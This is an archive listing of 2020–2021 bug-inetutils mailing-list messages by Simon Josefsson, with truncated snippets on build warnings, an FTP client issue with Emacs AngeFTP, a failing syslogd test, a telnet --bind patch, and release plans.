2021-05-25 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
"Alfred M. Szmidt" writes: >>* Fix All warnings with autoconf 2.71 - I didn't want to touch this >> before 2.0 since we had succesful build reports, but there are > plenty >> of old m4 constructs that we should use gnulib tools for instead. >> >>* use

Re: Emacs AngeFTP fails on macOS 10.14 with GNU inetutils FTP

2021-05-25 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Alex Bochannek writes: >> Probably gnulib's m4/readline.m4 should detect that this particular >> libreadline is not usable, but I wonder exactly what is wrong with it >> (and how to detect that). Maybe it is possible to make it work (the >> problem still seems related to stdin/stdout buffering

Re: Emacs AngeFTP fails on macOS 10.14 with GNU inetutils FTP

2021-05-24 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Alex Bochannek writes: > Simon Josefsson writes: > >>> Is this a known problem? Does this maybe work as intended? >> >> Hi. Thanks for the report. It is not a known problem. The output >> looks weird, and it could be readline or related to buffering. Could >> you debug this further to see

Re: Emacs AngeFTP fails on macOS 10.14 with GNU inetutils FTP

2021-05-21 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Alex Bochannek writes: > Hello! > > I sent in bug 48494: http://debbugs.gnu.org/cgi/bugreport.cgi?bug=48494 > to Emacs, but I am starting to think this might be an inetutils issue. > > I observed that AngeFTP cannot parse the output of the GNU inetutils FTP > client on macOS 10.14. It errors out

Re: syslogd.sh test fails when ipv6 is disabled

2021-05-06 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
> I will report back on the result of upgrading the Guix package of > inetutils to 2.0. Please do -- it should be in the Guix core-updates branch already. /Simon

Re: syslogd.sh test fails when ipv6 is disabled

2021-05-06 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Bone Baboon writes: > I am using the Guix operating system which is a build from source > operating system. When I build the Guix package for inetutils from > source it fails because the syslogd.sh test fails. I am building the > Guix inetutils package using this Guix command to build

telnet --bind

2021-04-28 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Hi. I'm trying to get Debian to use inetutils's telnet by default, and one discrepancy compared to their current implementation (netkit) was the --bind parameter. It seems useful, so I implemented it in inetutils (see patch below). It appears to work -- notice the different listen addresses in

Re: [PATCH 1/2] whois: .ORG is not handled by InterNIC anymore

2021-04-26 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
Thanks, I have applied these. /Simon

Re: next steps for inetutils?

2021-02-11 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
I've added these items to TODO, so we don't forget about them. /Simon

Re: next steps for inetutils?

2021-02-10 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
a...@gnu.org (Alfred M. Szmidt) writes: >* arp tool > >* nc (netcat) tool > > I like these additions, but I am worried about compatibility against > the more prolific versions of those tools. Agreed, an analysis of existing implementations and their differences would be useful. This

next steps for inetutils?

2021-02-05 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
"Alfred M. Szmidt" writes: > I'm ok with doing a release now. I pushed out a stable release now. Let's see if we get more testing than for the pre-releases; we can always release something in the coming weeks/month to fix build/portability stuff. There isn't a lot of testing on BSD, Solaris,

Re: TLS support

2020-12-24 Thread Simon Josefsson via Bug reports for the GNU Internet utilities
"David Diem" writes: > Hello, > > The inetutils /bin/ftp gives back the message "550 SSL/TLS required on > the control channel" in my case. (The debug and verbose command line > options do not produce any more related information than > that). However, other clients (lftp, ncftp, filezilla) do